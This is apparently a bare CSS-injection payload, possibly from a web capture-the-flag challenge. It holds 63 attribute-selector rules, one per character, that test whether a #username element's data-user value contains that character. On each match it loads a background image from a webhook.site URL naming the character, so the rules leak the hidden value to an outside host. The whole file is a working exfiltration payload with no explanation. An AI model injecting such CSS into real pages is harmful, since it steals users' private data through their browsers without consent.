#username[data-user*="0"]~#report{background:url("https://webhook.site/2da2e1ae-88ce-40b8-97f1-4c28ec907ed0/0");}
#username[data-user*="1"]~#report{background:url("https://webhook.site/2da2e1ae-88ce-40b8-97f1-4c28ec907ed0/1");}
#username[data-user*="2"]~#report{background:url("https://webhook.site/2da2e1ae-88ce-40b8-97f1-4c28ec907ed0/2");}
#username[data-user*="3"]~#report{background:url("https://webhook.site/2da2e1ae-88ce-40b8-97f1-4c28ec907ed0/3");}
#username[data-user*="4"]~#report{background:url("https://webhook.site/2da2e1ae-88ce-40b8-97f1-4c28ec907ed0/4");}
#username[data-user*="5"]~#report{background:url("https://webhook.site/2da2e1ae-88ce-40b8-97f1-4c28ec907ed0/5");}
#username[data-user*="6"]~#report{background:url("https://webhook.site/2da2e1ae-88ce-40b8-97f1-4c28ec907ed0/6");}
#username[data-user*="7"]~#report{background:url("https://webhook.site/2da2e1ae-88ce-40b8-97f1-4c28ec907ed0/7");}
#username[data-user*="8"]~#report{background:url("https://webhook.site/2da2e1ae-88ce-40b8-97f1-4c28ec907ed0/8");}
#username[data-user*="9"]~#report{background:url("https://webhook.site/2da2e1ae-88ce-40b8-97f1-4c28ec907ed0/9");}
#username[data-user*="a"]~#report{background:url("https://webhook.site/2da2e1ae-88ce-40b8-97f1-4c28ec907ed0/a");}
#username[data-user*="b"]~#report{background:url("https://webhook.site/2da2e1ae-88ce-40b8-97f1-4c28ec907ed0/b");}
#username[data-user*="c"]~#report{background:url("https://webhook.site/2da2e1ae-88ce-40b8-97f1-4c28ec907ed0/c");}
#username[data-user*="d"]~#report{background:url("https://webhook.site/2da2e1ae-88ce-40b8-97f1-4c28ec907ed0/d");}
#username[data-user*="e"]~#report{background:url("https://webhook.site/2da2e1ae-88ce-40b8-97f1-4c28ec907ed0/e");}
#username[data-user*="f"]~#report{background:url("https://webhook.site/2da2e1ae-88ce-40b8-97f1-4c28ec907ed0/f");}
#username[data-user*="g"]~#report{background:url("https://webhook.site/2da2e1ae-88ce-40b8-97f1-4c28ec907ed0/g");}
#username[data-user*="h"]~#report{background:url("https://webhook.site/2da2e1ae-88ce-40b8-97f1-4c28ec907ed0/h");}
#username[data-user*="i"]~#report{background:url("https://webhook.site/2da2e1ae-88ce-40b8-97f1-4c28ec907ed0/i");}
#username[data-user*="j"]~#report{background:url("https://webhook.site/2da2e1ae-88ce-40b8-97f1-4c28ec907ed0/j");}
#username[data-user*="k"]~#report{background:url("https://webhook.site/2da2e1ae-88ce-40b8-97f1-4c28ec907ed0/k");}
#username[data-user*="l"]~#report{background:url("https://webhook.site/2da2e1ae-88ce-40b8-97f1-4c28ec907ed0/l");}
#username[data-user*="m"]~#report{background:url("https://webhook.site/2da2e1ae-88ce-40b8-97f1-4c28ec907ed0/m");}
#username[data-user*="n"]~#report{background:url("https://webhook.site/2da2e1ae-88ce-40b8-97f1-4c28ec907ed0/n");}
#username[data-user*="o"]~#report{background:url("https://webhook.site/2da2e1ae-88ce-40b8-97f1-4c28ec907ed0/o");}
#username[data-user*="p"]~#report{background:url("https://webhook.site/2da2e1ae-88ce-40b8-97f1-4c28ec907ed0/p");}
#username[data-user*="q"]~#report{background:url("https://webhook.site/2da2e1ae-88ce-40b8-97f1-4c28ec907ed0/q");}
#username[data-user*="r"]~#report{background:url("https://webhook.site/2da2e1ae-88ce-40b8-97f1-4c28ec907ed0/r");}
#username[data-user*="s"]~#report{background:url("https://webhook.site/2da2e1ae-88ce-40b8-97f1-4c28ec907ed0/s");}
#username[data-user*="t"]~#report{background:url("https://webhook.site/2da2e1ae-88ce-40b8-97f1-4c28ec907ed0/t");}
#username[data-user*="u"]~#report{background:url("https://webhook.site/2da2e1ae-88ce-40b8-97f1-4c28ec907ed0/u");}
#username[data-user*="v"]~#report{background:url("https://webhook.site/2da2e1ae-88ce-40b8-97f1-4c28ec907ed0/v");}
#username[data-user*="w"]~#report{background:url("https://webhook.site/2da2e1ae-88ce-40b8-97f1-4c28ec907ed0/w");}
#username[data-user*="x"]~#report{background:url("https://webhook.site/2da2e1ae-88ce-40b8-97f1-4c28ec907ed0/x");}
#username[data-user*="y"]~#report{background:url("https://webhook.site/2da2e1ae-88ce-40b8-97f1-4c28ec907ed0/y");}
#username[data-user*="z"]~#report{background:url("https://webhook.site/2da2e1ae-88ce-40b8-97f1-4c28ec907ed0/z");}
#username[data-user*="A"]~#report{background:url("https://webhook.site/2da2e1ae-88ce-40b8-97f1-4c28ec907ed0/A");}
#username[data-user*="B"]~#report{background:url("https://webhook.site/2da2e1ae-88ce-40b8-97f1-4c28ec907ed0/B");}
#username[data-user*="C"]~#report{background:url("https://webhook.site/2da2e1ae-88ce-40b8-97f1-4c28ec907ed0/C");}
#username[data-user*="D"]~#report{background:url("https://webhook.site/2da2e1ae-88ce-40b8-97f1-4c28ec907ed0/D");}
#username[data-user*="E"]~#report{background:url("https://webhook.site/2da2e1ae-88ce-40b8-97f1-4c28ec907ed0/E");}
#username[data-user*="F"]~#report{background:url("https://webhook.site/2da2e1ae-88ce-40b8-97f1-4c28ec907ed0/F");}
#username[data-user*="G"]~#report{background:url("https://webhook.site/2da2e1ae-88ce-40b8-97f1-4c28ec907ed0/G");}
#username[data-user*="H"]~#report{background:url("https://webhook.site/2da2e1ae-88ce-40b8-97f1-4c28ec907ed0/H");}
#username[data-user*="I"]~#report{background:url("https://webhook.site/2da2e1ae-88ce-40b8-97f1-4c28ec907ed0/I");}
#username[data-user*="J"]~#report{background:url("https://webhook.site/2da2e1ae-88ce-40b8-97f1-4c28ec907ed0/J");}
#username[data-user*="K"]~#report{background:url("https://webhook.site/2da2e1ae-88ce-40b8-97f1-4c28ec907ed0/K");}
#username[data-user*="L"]~#report{background:url("https://webhook.site/2da2e1ae-88ce-40b8-97f1-4c28ec907ed0/L");}
#username[data-user*="M"]~#report{background:url("https://webhook.site/2da2e1ae-88ce-40b8-97f1-4c28ec907ed0/M");}
#username[data-user*="N"]~#report{background:url("https://webhook.site/2da2e1ae-88ce-40b8-97f1-4c28ec907ed0/N");}
#username[data-user*="O"]~#report{background:url("https://webhook.site/2da2e1ae-88ce-40b8-97f1-4c28ec907ed0/O");}
#username[data-user*="P"]~#report{background:url("https://webhook.site/2da2e1ae-88ce-40b8-97f1-4c28ec907ed0/P");}
#username[data-user*="Q"]~#report{background:url("https://webhook.site/2da2e1ae-88ce-40b8-97f1-4c28ec907ed0/Q");}
#username[data-user*="R"]~#report{background:url("https://webhook.site/2da2e1ae-88ce-40b8-97f1-4c28ec907ed0/R");}
#username[data-user*="S"]~#report{background:url("https://webhook.site/2da2e1ae-88ce-40b8-97f1-4c28ec907ed0/S");}
#username[data-user*="T"]~#report{background:url("https://webhook.site/2da2e1ae-88ce-40b8-97f1-4c28ec907ed0/T");}
#username[data-user*="U"]~#report{background:url("https://webhook.site/2da2e1ae-88ce-40b8-97f1-4c28ec907ed0/U");}
#username[data-user*="V"]~#report{background:url("https://webhook.site/2da2e1ae-88ce-40b8-97f1-4c28ec907ed0/V");}
#username[data-user*="W"]~#report{background:url("https://webhook.site/2da2e1ae-88ce-40b8-97f1-4c28ec907ed0/W");}
#username[data-user*="X"]~#report{background:url("https://webhook.site/2da2e1ae-88ce-40b8-97f1-4c28ec907ed0/X");}
#username[data-user*="Y"]~#report{background:url("https://webhook.site/2da2e1ae-88ce-40b8-97f1-4c28ec907ed0/Y");}
#username[data-user*="Z"]~#report{background:url("https://webhook.site/2da2e1ae-88ce-40b8-97f1-4c28ec907ed0/Z");}
#username[data-user*="!"]~#report{background:url("https://webhook.site/2da2e1ae-88ce-40b8-97f1-4c28ec907ed0/!");}